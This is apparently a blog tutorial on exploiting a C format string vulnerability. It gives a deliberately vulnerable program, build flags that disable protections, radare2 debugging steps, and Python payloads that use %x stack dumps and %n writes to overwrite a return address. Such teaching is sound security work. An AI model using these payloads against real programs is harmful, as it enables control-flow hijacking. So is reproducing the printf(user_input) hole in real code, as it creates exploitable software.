Mastering Format String Exploits: A Comprehensive Guide

12 min read

November 5, 2023

Initiating Linux Binary Exploitation: A Beginner's Expedition into Code Manipulation

Delving into Format String Vulnerabilities: An Educational Expedition

Welcome, cyber enthusiasts and aspiring security professionals! Today's chapter unfolds an intriguing aspect of cybersecurity – the format string vulnerability, a classic yet crucial topic in the realm of secure coding. My personal journey with this vulnerability holds a special place, as it was the first one I mastered, offering insights not just into code exploits but also into the broader landscape of software vulnerabilities.

In this chapter, we're set to embark on a comprehensive journey, starting from the very basics of what a format string is and how it functions in the C programming language. We'll see how a simple string formatting feature in printf can turn into a security vulnerability when influenced by user input.

Our expedition will take us through:

  1. The Anatomy of Format Strings: Understanding how format strings operate within printf, showcasing their standard use and potential pitfalls.
  2. Unveiling the Vulnerability: A step-by-step breakdown of how format strings can be exploited, using a sample C program as our testing ground.
  3. Exploit Development with Radare2: Employing the powerful binary analysis tool, radare2, we will analyze, debug, and manipulate our test program, gaining hands-on experience in exploit development.
  4. Crafting a Python Exploit: Translating our findings into a practical exploit script, showcasing the real-world application of our theoretical knowledge.
  5. Understanding the Risks: Highlighting the critical importance of secure coding practices and the potential consequences of overlooking format string vulnerabilities.

Whether you're a seasoned security professional or a curious novice, this chapter promises a blend of technical depth and accessible learning. By the end of our exploration, you'll not only understand the intricacies of format string vulnerabilities but also appreciate their significance in the broader context of cybersecurity. So, let's dive in and unravel the mysteries of format string vulnerabilities together!

Understanding Format Strings: The Basics of printf Functionality

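Dive into the world of C programming, where the format string, the first argument of printf, shapes the output: it mixes ordinary text with conversion specifiers (such as %s or %x) that tell printf how to render each of the remaining arguments. Imagine you're working with the following C code: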

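#include <stdio.h>
#include <string.h>

int main(int argc, char **argv){
  char to_print[6] = "hello";   // 5 letters plus the terminating '\0'
  printf("%s\n",to_print);      // prints the characters: hello
  printf("%x\n",to_print);      // prints the pointer value (the address) in hex on a 32-bit build; %p is the portable choice
}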

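In this snippet, to_print is a friendly string that printf greets twice, each time with a different specifier. %s treats the argument as a pointer to a NUL-terminated string and prints its characters, while %x treats the very same argument as an unsigned integer and prints it in hexadecimal. Since an array passed to a function decays to a pointer, what %x reveals is the string's memory address (on a 32-bit build, where a pointer and an unsigned int have the same size).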

Example of a format string

These format specifiers, %s and %x, are like secret codes that control how each argument is presented. There's a whole world of them, such as %d for signed decimal integers, each adding its own flavor to the output. But here's a twist: if an attacker takes the reins of the format string itself, it's no longer just about presentation; it can open up serious security holes. And guess what? We're about to explore this intriguing and risky avenue in the next section!
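Python's printf-style % operator borrows C's conversion specifiers, so it offers a quick, safe way to try them out. Treat it only as an analogy for C's printf: Python's version has no %n at all, and it raises an error instead of reading stray memory when the arguments run out.

```python
# Python's printf-style formatting reuses C's conversion specifiers.
# It is an analogy for C's printf, not the same implementation.
value = 255

print("%s" % "hello")  # hello : the argument rendered as text
print("%x" % value)    # ff    : the argument rendered in hexadecimal
print("%d" % value)    # 255   : the argument rendered as a signed decimal

# Unlike C's printf, Python checks the arguments against the specifiers.
try:
    "%x %x" % (value,)
except TypeError as err:
    print("TypeError:", err)  # TypeError: not enough arguments for format string
```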

Exploring the Intricacies of a Format String Vulnerability

Let's delve into the mechanics of a format string vulnerability, using a simple yet illustrative piece of C code. Picture this:

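#include <stdio.h>
#include <string.h>

void vuln(char *vuln_param){
  int local_var = 0x123;              // locals like these end up in the stack dump
  char str[13] = "AAAABBBBCCCC\0";
  char to_print[6]  = "hello\0";
  printf(vuln_param, to_print);       // BUG: user input is used as the format string
}

int main(int argc, char **argv){
  vuln(argv[1]);                      // argv[1] is fully controlled by the user
}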

Here we have a classic setup with two functions: main, which hands the first command-line argument to vuln, and vuln itself. The twist? That user-supplied argument goes straight into printf as its format string, handing an external user an unusual level of control.

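Inside vuln, the variables local_var, str, and to_print are not just random data; they're key players setting the stage for our exploration. They live in vuln's stack frame, just above the arguments printf receives, so they will be easy to spot once we start leaking memory.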

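Now, let's compile this intriguing code. The flags strip away protections that would otherwise get in the way: -m32 builds a 32-bit binary whose function arguments are passed on the stack, -no-pie keeps the code at fixed addresses, -fno-stack-protector removes the stack canary, -mpreferred-stack-boundary=2 aligns the stack to 4 bytes instead of the default 16, -z execstack marks the stack as executable, and -ggdb adds debugging information: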

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o formatstring formatstring.c
Example of normal execution

Under normal circumstances, what you type is what you get on the screen. But what if we spice things up a bit? Pass %s or %x as the argument, and printf suddenly reveals either to_print's contents or its memory address, since to_print is the one real argument that follows the format string.

Example introduction of format strings
Introduction of multiple format strings

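But wait, there's more! What if we flood printf with a barrage of %x specifiers? Surprise: a memory dump! Why does this happen? printf has no way of knowing how many arguments it actually received: for every specifier in the format string, it simply fetches the next argument from where that argument would be, which on 32-bit x86 is the next 4-byte word on the stack. Once the specifiers outnumber the real arguments, printf keeps reading whatever lies further up the stack, including vuln's local variables. For instance, enter enough %x specifiers and you'll see 42414141: the bytes 41 41 41 42 ("AAAB") from the str variable, which %x shows in reverse order ("BAAA") because x86 stores words in little-endian order.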

Recognizing data
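To see why 42414141 stands for the bytes "AAAB" in memory rather than "BAAA", the small helper below (a hypothetical name, written for this walkthrough) converts a word printed by %x back into its in-memory byte order. It assumes a 32-bit little-endian target such as our -m32 build; int(..., 16) also copes with the leading zeros that %x omits.

```python
import struct


def leak_to_bytes(word_hex: str) -> bytes:
    """Convert one word printed by %x back into its in-memory byte order.

    On 32-bit x86 a word is stored little-endian: its least significant
    byte sits at the lowest address, so %x prints the bytes "backwards".
    """
    return struct.pack("<I", int(word_hex, 16))


leaked = "42414141"
print(bytes.fromhex(leaked))   # b'BAAA': the hex digits read left to right
print(leak_to_bytes(leaked))   # b'AAAB': the bytes as they sit in str
```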

This diagram simplifies what happens when we overload printf with format specifiers: each extra specifier consumes one more 4-byte word of the stack, exposing data that was never meant to be printed.

Stack diagram

So, we've learned to unearth the process's in-memory secrets. But is that all? Can this vulnerability be leveraged further? Let's keep digging to find out!

Mastering the Art of Memory Manipulation: The Format String Offense

Diving deeper into format string vulnerabilities, we encounter %n: a seemingly innocuous specifier that holds the power to write into memory. Instead of printing anything, %n stores the number of characters printed so far into the int pointed to by its corresponding argument. The printf function, often a benign utility, can turn into a hacker's canvas when %n comes into play, especially when the format string is influenced by external, user-provided data.

man 3 printf
💡
Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

The printf function, when fed with untrusted input containing %n, inadvertently becomes a tool to modify memory. This ability to write arbitrarily in memory opens up two intriguing pathways for exploitation:

  1. Variable Overwrite: Imagine being able to change the value of a variable within a program, potentially unlocking areas or functionalities that are meant to be off-limits.
  2. Return Address Hijacking: The more ambitious path – modifying the return address of a function to wrest control of the program's execution flow.
Attack methodology

For today's exploration, our focus is laser-sharp on the latter: manipulating the function's return address. Here's the game plan:

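  1. Place the address of the stack slot that holds the return address at the start of the format string, so a copy of it sits on the stack along with the rest of our input.
  2. Walk up the stack with a series of %x specifiers until one of them prints that address.
  3. Once located, replace that %x with %n, so printf writes to the address instead of printing it.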

Sounds complex? Fear not! We're about to break it down step by step, transforming this high-level strategy into an actionable exploit. Let's embark on this journey of memory manipulation!
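Before touching the real binary, the three-step plan can be rehearsed on a toy model. The toy_printf function below is a hypothetical simplification written for this walkthrough, not glibc's implementation: it treats the stack as a Python list of 4-byte words, supports only %x, %n and %%, and records %n writes in a dictionary standing in for memory. The stack contents are made up; only the mechanics matter.

```python
def toy_printf(fmt: str, stack: list[int], memory: dict[int, int]) -> str:
    """Toy model of 32-bit printf: every specifier takes the next stack word.

    printf cannot tell how many arguments the caller really passed, so it
    keeps fetching words for as long as the format string asks for them.
    Only %x, %n and %% are modelled.
    """
    out: list[str] = []
    arg = 0  # index of the next word printf will fetch
    i = 0
    while i < len(fmt):
        if fmt[i] != "%":
            out.append(fmt[i])  # ordinary characters are copied as-is
            i += 1
            continue
        if i + 1 >= len(fmt):
            raise ValueError("format string ends with a lone %")
        spec = fmt[i + 1]
        i += 2
        if spec == "%":
            out.append("%")
        elif spec == "x":
            out.append(format(stack[arg], "x"))  # print the word in hex
            arg += 1
        elif spec == "n":
            # %n prints nothing: it stores the number of characters written
            # so far at the address given by the next word
            memory[stack[arg]] = len("".join(out))
            arg += 1
        else:
            raise ValueError(f"%{spec} is not modelled")
    return "".join(out)


# Made-up stack: two unrelated words, then the address we injected (step 1)
stack = [0x8, 0xf7fa, 0xffffd6e0]
memory: dict[int, int] = {}

print(toy_printf("%x %x %x", stack, memory))        # 8 f7fa ffffd6e0 (step 2: found it)
print(repr(toy_printf("%x %x %n", stack, memory)))  # '8 f7fa ' (step 3: write instead)
print({hex(addr): val for addr, val in memory.items()})  # {'0xffffd6e0': 7}
```

The value 7 is simply the length of "8 f7fa ", the text printed before %n. In the real attack, that count is what lands in the targeted return address.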

Exploit Development

Crafting the Exploit: Navigating the Memory Maze

As we embark on the quest to develop an exploit for the format string vulnerability, the first step is pinpointing where the function's return address is stored. This critical detail lies within the recesses of the program's memory, and to uncover it, we turn to the trusty tool radare2.

r2 -d formatstring

Using radare2, we delve into the binary's structure: we analyze it (aaa), list its functions (afl) to find the vulnerable vuln function, and set a breakpoint at its start (db sym.vuln), laying the groundwork for our exploit.

We analyzed and found vulnerable function name
We set a breakpoint at the beginning of the function

We then use the command "dc" (debug continue) to run the program until it hits that breakpoint, which lets us scrutinize the stack at the moment vuln is entered.

Memory address pointing to the return address

Our prize? The memory address where the function's return address resides. Because execution stops on vuln's very first instruction, the call instruction has just pushed the return address, so it sits at the top of the stack, at the address held in esp; it is highlighted in red in the provided image. To double-check, observe that the value stored there is the address of the instruction in main that follows the call to vuln.

Return address

Constructing the Payload: A Step Towards Control

Equipped with the knowledge of the memory address containing the function's return address, we move to the next phase of our exploit: crafting a payload that harnesses this information.

Our Python script, leveraging the power of the pwn library, is succinct yet potent. The script constructs a payload that embeds the crucial memory address:

from pwn import *
import sys

payload = b""
payload += p32(0xffffd920)
sys.stdout.buffer.write(payload)

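In this snippet, p32(0xffffd920) packs the address into 4 bytes in little-endian order, the byte order our 32-bit x86 program uses to store it in memory. The script writes these raw bytes to standard output, ready to be passed to the vulnerable program as its command-line argument, for example with ./formatstring "$(python3 exploit.py)", where exploit.py is whatever you named the script.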
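If you want to check what p32 produces without pwntools, the standard struct module gives the same four bytes (assuming pwntools' default little-endian context). Printing them also highlights two details of this particular address: its lowest byte, 0x20, is an ASCII space, so the payload must be quoted when passed through a shell or it will be split into two arguments; and none of its bytes is 0x00, which could never appear inside a command-line argument because it terminates the C string.

```python
import struct

addr = 0xffffd920
packed = struct.pack("<I", addr)  # "<I": little-endian unsigned 32-bit, like p32(addr)

print(packed)             # b' \xd9\xff\xff'
print(packed.hex())       # 20d9ffff : least significant byte first
print(b"\x00" in packed)  # False: no NUL byte, so it fits inside argv
```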

Memory address not displayable

When this payload is passed to our vulnerable program, it becomes the format string itself. It contains no % specifiers, so printf simply copies the four bytes to the output, but they do not form readable text, so nothing meaningful appears on the screen.

Refining the Payload: Pinpointing the Return Address

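The journey of exploit development now enters a crucial phase where precision and observation converge. Our objective is to find, among the words printf leaks, the copy of the address we injected. To achieve this, we extend our Python exploit with "%x " specifiers that walk up the program's stack. Notice that the target address has changed from 0xffffd920 to 0xffffd6e0: the command-line argument is stored near the top of the stack, so a much longer payload pushes vuln's stack frame to lower addresses (0xffffd920 - 0xffffd6e0 = 0x240, that is 576 bytes, close to the 570 bytes of "%x " added here). Whenever the payload length changes noticeably, the address should be checked again in radare2.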

from pwn import *
import sys

payload = b""
payload += p32(0xffffd6e0)
payload += b"%x " * 190
sys.stdout.buffer.write(payload)
Recognizable pattern

As depicted in the image above, a distinctive repeating pattern begins to emerge from the yellow segment onwards. These words are the bytes of our own "%x " specifiers, read back from the stack 4 bytes at a time.

Identify that it is "%x"

In simpler terms, printf has walked far enough up the stack to reach the format string we supplied to it, in other words our own payload.

Updated diagram
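The repeating words in that dump can be predicted ahead of time. Since 0x25 is "%", 0x78 is "x" and 0x20 is a space, and "%x " is 3 bytes long, any 4-byte window over a run of it can only be one of three words, whatever the alignment. The helper below (a hypothetical name) computes them, again assuming a little-endian 32-bit target.

```python
import struct


def pattern_words(chunk: bytes = b"%x ", repeats: int = 4) -> list[str]:
    """Hex words that %x would print for a run of `chunk` stored in memory."""
    data = chunk * repeats
    usable = len(data) - len(data) % 4  # only whole 4-byte words
    return [
        format(struct.unpack_from("<I", data, offset)[0], "x")
        for offset in range(0, usable, 4)
    ]


print(pattern_words())  # ['25207825', '78252078', '20782520']
```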

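However, in the memory dump it is hard to tell precisely where our injected address, the location of the return address, appears. Hence, we prepend a series of "A" characters to pad the way: they show up as easy-to-spot 41414141 words right before the address, and changing their number shifts where the address falls within the 4-byte words that %x reads.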

from pwn import *
import sys

payload = b"A" * 29
payload += p32(0xffffd6e0)
payload += b"%x " * 190
sys.stdout.buffer.write(payload)
Recognizing the memory address

Thanks to this padding, combined with the matching "%x" pattern, we can now approximate the whereabouts of our injected address, the argument we want "%n" to use. Our main objectives at this stage are twofold:

  1. Identify the exact "%x" that prints the injected address.
  2. Align the payload so that the whole address is printed by a single "%x", which we can later turn into "%n".
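Counting the %x outputs by eye is error-prone, so a small helper can handle the first objective. find_specifier is a hypothetical name; it assumes you pass only the part of printf's output produced by the "%x " run (the echoed "A" padding and raw address bytes come first and are not separated from the first word by a space), and the sample dump below is made up.

```python
def find_specifier(dump: str, target: int) -> int:
    """Return the 1-based position of the %x whose output equals `target`.

    `dump` is the text printed by a run of "%x " specifiers: hex words
    separated by spaces. Raises ValueError if the target never appears.
    """
    for position, word in enumerate(dump.split(), start=1):
        if int(word, 16) == target:
            return position
    raise ValueError(f"{target:#x} was not printed by any %x")


# Made-up output of six "%x " specifiers
dump = "f7ffd000 8 41414141 41414141 ffffd6e0 25207825"
print(find_specifier(dump, 0xffffd6e0))  # 5
```

A result of N means the payload needs N - 1 copies of "%x " followed by the lone %x that later becomes %n; 171, for instance, is where this walkthrough ends up.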

With these goals in mind, let's adapt our exploit to locate the crucial "%x."

from pwn import *
import sys

payload = b"A" * 29
payload += p32(0xffffd6e0)
payload += b"%x " * 190
payload += b"%x"
payload += b"B" * 34
sys.stdout.buffer.write(payload)
  • To start, we've introduced a separate "%x", which we will later convert to "%n".
  • Additionally, we've appended "B" padding characters: changing their number shifts where the whole argument lands on the stack, which lets us align the injected address so that it is read by exactly one "%x".
💡
At this juncture, I recommend executing the exploit directly with radare2 to scrutinize its behavior.

Upon running the script, we notice that many "%x" specifiers still come after the one that prints our address, so further adjustments and fine-tuning are required.

Entering the padding at the end with "B"

When the "%x" run ends right around the injected address and stops printing further memory values, it's time to refine the count of "B" characters at the end. In my case, the exploit settled at 171 specifiers: 170 copies of "%x " followed by the lone "%x".

from pwn import *
import sys

payload = b"A"*29
payload += p32(0xffffd6e0)
payload += b"%x " * 170
payload += b"%x"
payload += b"B"* 34
sys.stdout.buffer.write(payload)
Locating the final %x

As we execute this script, we observe the memory dump and make iterative adjustments to the number of "%x" and "B"s, striving for an alignment that places our target address precisely within a single "%x". This meticulous process involves running the script multiple times, each time tweaking the payload slightly:

from pwn import *
import sys

payload = b"A"*29
payload += p32(0xffffd6e0)
payload += b"%x " * 170
payload += b"%x"
payload += b"B"* 30
sys.stdout.buffer.write(payload)
%x number 171
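With the 171st specifier printing the injected address, the last step of the game plan is to swap that lone %x for %n. Below is a sketch of that final payload, otherwise identical to the previous script. It uses struct.pack in place of pwntools' p32 (the same bytes, assuming pwntools' default little-endian context), and the address and counts are the ones found in this walkthrough, so they will differ on another machine. Because %x and %n are both two bytes long, the swap leaves the payload's length unchanged, so the stack layout measured with the probe stays valid.

```python
import struct
import sys

payload = b"A" * 29                       # same "A" padding as the probe
payload += struct.pack("<I", 0xffffd6e0)  # where vuln's return address is stored
payload += b"%x " * 170                   # walk past the first 170 stack words
payload += b"%n"                          # was "%x": now writes through word 171
payload += b"B" * 30                      # same trailing padding as the probe

if __name__ == "__main__":
    sys.stdout.buffer.write(payload)
```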

When the alignment is perfected, the 171st specifier prints exactly our injected memory address, so swapping that lone "%x" for "%n" makes printf write to it instead. We verify this by placing a breakpoint just before vuln returns and inspecting the stack: the return address has visibly changed, signifying our successful manipulation.

Breakpoint just before leaving the vulnerable function
Evidence of modification of return address

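Continuing execution after the modification leads to a crash: %n replaced the return address with the number of characters printed so far, which is not a valid code address, so the function "returns" into unmapped memory. That crash is a clear indication of our exploit's impact: we have effectively altered the program's execution flow, demonstrating the potency of format string vulnerabilities.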

Change of the return address
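Why a crash rather than a neat redirection? %n stores the number of characters printf has output so far, so the new return address is just that count. The hypothetical helper below computes it from the words the "%x " run printed; the sample words are made up.

```python
def n_value(prefix_len: int, walked_words: list[str]) -> int:
    """Number of characters printf has output when it reaches %n.

    prefix_len   -- bytes echoed before the first %x ("A" padding + 4 address bytes)
    walked_words -- hex strings printed by each preceding "%x " specifier
    Each "%x " contributes its hex digits plus one space.
    """
    return prefix_len + sum(len(word) + 1 for word in walked_words)


print(n_value(29 + 4, ["f7ffd000", "8", "41414141"]))  # 53
```

With 170 walking specifiers, each printing between 1 and 8 hex digits plus a space, the value written lands between 33 + 2 * 170 = 373 and 33 + 9 * 170 = 1563, far below where a 32-bit non-PIE binary's code is normally mapped (around 0x08048000). Redirecting execution to a chosen address would mean controlling that count, which this walkthrough does not attempt.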

Concluding Insights: The Power and Risks of Format String Vulnerabilities

In this exploration of format string vulnerabilities, we've delved deep into the mechanics and implications of this classic yet potent security flaw. Our journey illuminated the dual aspects of format strings in C programming: their utility in formatting outputs and their potential as a security vulnerability when improperly managed.

Key Takeaways:

  1. Understanding Format Strings: We began by understanding the basic role of format strings in functions like printf, where they dictate how variables are displayed. The seemingly benign use of %s for strings or %x for hexadecimal values, when user-controlled, opened the door to memory manipulation.
  2. Vulnerability in Action: Through a hands-on example, we witnessed how user-controlled format strings could lead to memory dumps. Because printf cannot tell how many arguments it actually received, every extra specifier made it read, and with %n write, memory it was never meant to touch.
  3. Crafting the Exploit: The real crux of our journey was developing an exploit. We methodically constructed a Python script to exploit the vulnerability, showcasing each step from injecting memory addresses to locating and modifying the return address of a function.
  4. Radare2 as a Tool: Utilizing radare2, a powerful binary analysis tool, we analyzed and debugged our vulnerable program. This process was instrumental in understanding the stack's behavior and refining our exploit.
  5. Exploitation Strategy: Our exploit strategically used %n, a format specifier that allows writing to memory, turning a simple output function into a potent tool for altering a program's execution flow.
  6. Implications and Caution: This exploration underscores the importance of handling user input carefully, above all never passing it to printf-style functions as the format string; print it through a constant format instead, as in printf("%s", user_input). It serves as a reminder of the delicate balance between functionality and security in programming.
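In C, the fix is to keep the format string constant and pass the input as an argument: printf("%s", user_input). To observe that behavior from Python, the sketch below calls the C library's snprintf through ctypes (assuming a Linux-style system where the C library can be loaded this way; format_safely is a hypothetical name). The % characters in the input come back untouched because they are data, not part of the format.

```python
import ctypes
import ctypes.util

# Load the C library; on Linux, CDLL(None) also exposes libc's symbols
libc = ctypes.CDLL(ctypes.util.find_library("c") or None)


def format_safely(user_input: bytes) -> bytes:
    """Render untrusted bytes through a constant "%s" format, like printf("%s", s).

    Inputs longer than 255 bytes are truncated by the fixed-size buffer.
    """
    buf = ctypes.create_string_buffer(256)
    # The format is a constant we control; user_input is only an argument,
    # so any %x or %n inside it is copied literally, never interpreted.
    libc.snprintf(buf, ctypes.c_size_t(ctypes.sizeof(buf)), b"%s", user_input)
    return buf.value


print(format_safely(b"%x %x %n"))  # b'%x %x %n'
```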

In summary, the format string vulnerability offers a compelling case study in cybersecurity. It exemplifies how a fundamental aspect of programming can be twisted into a security threat, reminding us of the constant vigilance required in the digital realm. Our hands-on approach not only unveiled the technicalities of exploiting this vulnerability but also highlighted the broader implications for secure coding practices. As we conclude this chapter, we are left with a deeper appreciation for the intricacies of cybersecurity and the ever-evolving challenge of protecting digital systems.

Tips from the article

What is a format string?

A format string is the text that tells the "printf" function how to format each of its arguments. For example, %x displays a value in hexadecimal, while %s prints the string a pointer refers to as ASCII text.

What are the consequences of passing a user-controlled format string to printf?
  • An attacker can enter multiple "%x" specifiers to dump large parts of the stack.
  • An attacker can enter "%n" to write values to memory.
What does an attacker typically aim for when writing to memory through a format string?
  • Overwriting the return address of a function to take over the execution flow.
  • Modifying the value of a particular variable to change the execution flow of the program.
What are the key steps when exploiting this vulnerability to modify the return address?
Attack methodology

